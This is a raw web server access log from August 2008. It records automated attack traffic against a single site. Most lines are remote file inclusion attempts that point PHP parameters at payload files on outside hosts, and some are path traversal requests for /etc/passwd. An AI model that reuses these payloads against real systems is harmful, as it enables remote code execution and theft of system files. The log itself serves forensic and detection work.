66.40.56.32 - - [24/Aug/2008:09:10:44 -0700] "GET /logs/access_080516.log/index.php?open=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.40.56.32 - - [24/Aug/2008:09:10:44 -0700] "GET /logs/index.php?open=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.40.56.32 - - [24/Aug/2008:09:10:45 -0700] "GET /index.php?open=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 9899 "-" "libwww-perl/5.811" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:09:10:47 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 200 9980 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:09:10:48 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:10:51 -0700] "GET /logs/access_080703.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:10:52 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 200 9980 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:10:52 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
68.178.198.129 - - [24/Aug/2008:09:11:00 -0700] "GET /logs//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 62004 "-" "libwww-perl/5.79" "www.dmulk.com"
68.178.198.129 - - [24/Aug/2008:09:11:00 -0700] "GET /logs//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 62004 "-" "libwww-perl/5.79" "www.dmulk.com"
68.178.198.129 - - [24/Aug/2008:09:11:01 -0700] "GET //?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 9939 "-" "libwww-perl/5.79" "www.dmulk.com"
68.178.198.129 - - [24/Aug/2008:09:11:02 -0700] "GET //?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 9939 "-" "libwww-perl/5.79" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:11:21 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:11:22 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://septimamaipu.cl/septima/mambots/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:09:11:39 -0700] "GET /logs/access_080412.log/index.php?sourcedir=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:09:11:39 -0700] "GET /logs/access_080412.log/index.php?sourcedir=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:09:11:39 -0700] "GET /index.php?sourcedir=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 200 9892 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:09:11:39 -0700] "GET /logs/index.php?sourcedir=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:09:11:40 -0700] "GET /index.php?sourcedir=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 200 9892 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:09:11:40 -0700] "GET /logs/index.php?sourcedir=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:11:47 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:11:48 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:09:11:49 -0700] "GET /logs/access_080313.log/index.php?sourcedir=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
198.66.222.121 - - [24/Aug/2008:09:11:49 -0700] "GET /logs/access_080313.log/index.php?sourcedir=http://septimamaipu.cl/septima/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:12:00 -0700] "GET /logs//pmi_v28/Includes/global.inc.php?strIncludePrefix=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.20.130 - - [24/Aug/2008:09:12:00 -0700] "GET //pmi_v28/Includes/global.inc.php?strIncludePrefix=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:12:00 -0700] "GET /logs/access_080518.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
218.188.197.136 - - [24/Aug/2008:09:12:09 -0700] "GET /logs/access_080503.log/index2.php?p=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.188.197.136 - - [24/Aug/2008:09:12:09 -0700] "GET /logs/index2.php?p=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:09:12:16 -0700] "GET /logs/access_080703.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:09:12:18 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 200 9980 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:09:12:18 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.188.197.136 - - [24/Aug/2008:09:12:20 -0700] "GET /logs/access_080223.log/index2.php?p=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:09:12:52 -0700] "GET /logs/access_080404.log/language/lang_german/lang_main_album.php?phpbb_root_path=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:13:17 -0700] "GET /logs/access_080223.log//?path%5Bdocroot%5D=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:13:17 -0700] "GET /logs/access_080223.log//?path%5Bdocroot%5D=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:13:19 -0700] "GET //?path%5Bdocroot%5D=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 200 9896 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:13:19 -0700] "GET //?path%5Bdocroot%5D=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 200 9905 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:13:20 -0700] "GET /logs//?path%5Bdocroot%5D=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 200 62004 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:13:20 -0700] "GET /logs//?path%5Bdocroot%5D=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 200 62004 "-" "libwww-perl/5.65" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:13:26 -0700] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.91.99.14 - - [24/Aug/2008:09:13:26 -0700] "GET /logs/access_080327.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.91.99.14 - - [24/Aug/2008:09:13:26 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.91.99.14 - - [24/Aug/2008:09:13:27 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://pa-lavvenireprato.it/administrator/components/com_remository/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:13:27 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 200 9976 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:13:27 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:13:31 -0700] "GET /logs/access_080503.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:13:41 -0700] "GET /logs/access_080731.log//?path%5Bdocroot%5D=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [24/Aug/2008:09:13:41 -0700] "GET /logs/access_080731.log//?path%5Bdocroot%5D=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:09:14:14 -0700] "GET /logs/access_080518.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.243.226 - - [24/Aug/2008:09:14:24 -0700] "GET /logs/stats.php?dir[func]=dir[base]=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
74.53.243.226 - - [24/Aug/2008:09:14:24 -0700] "GET /stats.php?dir[func]=dir[base]=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
74.53.243.226 - - [24/Aug/2008:09:14:24 -0700] "GET /logs/access_080207.log/stats.php?dir[func]=dir[base]=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:09:14:47 -0700] "GET /logs/access_080228.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:09:14:51 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 200 9976 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:09:14:52 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.40.56.32 - - [24/Aug/2008:09:14:56 -0700] "GET /logs/access_080626.log/index.php?open=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.130.242.135 - - [24/Aug/2008:09:15:14 -0700] "GET /logs/index.php?body=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.130.242.135 - - [24/Aug/2008:09:15:16 -0700] "GET /index.php?body=http://www.apnic.net/index.html? HTTP/1.0" 200 9845 "-" "Mozilla/5.0" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:09:15:18 -0700] "GET /logs/access_080503.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:09:15:24 -0700] "GET /logs/access_080126.log//modules/My_eGallery/index.php?basepath=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:09:15:25 -0700] "GET //modules/My_eGallery/index.php?basepath=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:09:15:25 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
193.85.215.9 - - [24/Aug/2008:09:15:40 -0700] "GET /logs//wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.keithpatrickgriffith.com/idevaffiliate/images/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
193.85.215.9 - - [24/Aug/2008:09:15:41 -0700] "GET //wp-content/plugins/myflash/myflash-button.php?wpPATH=http://www.keithpatrickgriffith.com/idevaffiliate/images/readme.do?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.212.108 - - [24/Aug/2008:09:16:03 -0700] "GET /logs//?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 62004 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.212.108 - - [24/Aug/2008:09:16:05 -0700] "GET //?option=com_juser&Itemid=&mosConfig_absolute_path=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 9939 "-" "libwww-perl/5.805" "www.dmulk.com"
64.185.237.191 - - [24/Aug/2008:09:16:26 -0700] "GET /logs/access_080803.log/index.php?sourcedir=http://goodscanid.thewomanizer.net/verifica.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.185.237.191 - - [24/Aug/2008:09:16:26 -0700] "GET /logs/access_080803.log/index.php?sourcedir=http://goodscanid.thewomanizer.net/verifica.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.185.237.191 - - [24/Aug/2008:09:16:28 -0700] "GET /index.php?sourcedir=http://goodscanid.thewomanizer.net/verifica.txt? HTTP/1.1" 200 9882 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.185.237.191 - - [24/Aug/2008:09:16:28 -0700] "GET /index.php?sourcedir=http://goodscanid.thewomanizer.net/verifica.txt? HTTP/1.1" 200 9882 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:09:16:30 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.185.237.191 - - [24/Aug/2008:09:16:30 -0700] "GET /logs/access_080213.log/index.php?sourcedir=http://goodscanid.thewomanizer.net/verifica.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.185.237.191 - - [24/Aug/2008:09:16:30 -0700] "GET /logs/access_080213.log/index.php?sourcedir=http://goodscanid.thewomanizer.net/verifica.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:09:16:30 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:09:16:34 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.94.70.15 - - [24/Aug/2008:09:17:10 -0700] "GET /logs/access_080726.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.70.15 - - [24/Aug/2008:09:17:10 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.70.15 - - [24/Aug/2008:09:17:10 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.94.70.15 - - [24/Aug/2008:09:17:55 -0700] "GET /logs/access_080621.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.teamprobes.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.243.226 - - [24/Aug/2008:09:18:06 -0700] "GET /logs/access_080211.log/stats.php?dir[func]=dir[base]=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:18:08 -0700] "GET /logs/access_080207.log//?path%5Bdocroot%5D=http://www.sweetviolence.com/tatika/phpraider/templates_c/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:09:18:14 -0700] "GET /logs/access_080517.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:09:18:16 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 200 9976 "-" "libwww-perl/5.811" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:09:18:17 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:18:26 -0700] "GET /logs/access_080510.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:18:27 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 200 9983 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:18:28 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.194.149.146 - - [24/Aug/2008:09:18:30 -0700] "GET /logs/access_080207.log//?path%5Bdocroot%5D=http://septimamaipu.cl/septima/mambots/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:09:18:32 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:09:18:34 -0700] "GET /logs/access_080510.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:09:18:35 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 200 9983 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:09:18:36 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.84.182.98 - - [24/Aug/2008:09:18:43 -0700] "GET /logs/access_080723.log//index.php?DOCUMENT_ROOT=http://poko.club.hu/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.84.182.98 - - [24/Aug/2008:09:18:44 -0700] "GET //index.php?DOCUMENT_ROOT=http://poko.club.hu/id1.txt???? HTTP/1.1" 200 9875 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.84.182.98 - - [24/Aug/2008:09:18:46 -0700] "GET /logs/access_080723.log/errors.php?error=http://poko.club.hu/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.84.182.98 - - [24/Aug/2008:09:18:46 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.84.182.98 - - [24/Aug/2008:09:19:13 -0700] "GET /logs/access_080722.log//index.php?DOCUMENT_ROOT=http://poko.club.hu/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
70.84.182.98 - - [24/Aug/2008:09:19:14 -0700] "GET /logs/access_080722.log/errors.php?error=http://poko.club.hu/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:19:23 -0700] "GET /logs/access_080404.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:09:19:25 -0700] "GET /logs/access_080404.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.87.154.41 - - [24/Aug/2008:09:19:29 -0700] "GET /logs/access_080404.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/check.port/soucer/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
62.87.154.41 - - [24/Aug/2008:09:19:30 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/check.port/soucer/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
62.87.154.41 - - [24/Aug/2008:09:19:30 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/check.port/soucer/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
62.87.154.41 - - [24/Aug/2008:09:19:51 -0700] "GET /logs/access_080209.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/check.port/soucer/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:09:19:59 -0700] "GET /logs//myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:09:19:59 -0700] "GET //myspeach/jscript.php?my_ms[root]=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:20:07 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:09:20:08 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 200 9980 "-" "libwww-perl/5.811" "www.dmulk.com"
62.87.154.41 - - [24/Aug/2008:09:20:13 -0700] "GET /logs/access_080110.log//werbungFrame.php?do=http://www.geocities.com/check.port/soucer/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
62.87.154.41 - - [24/Aug/2008:09:20:13 -0700] "GET //werbungFrame.php?do=http://www.geocities.com/check.port/soucer/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
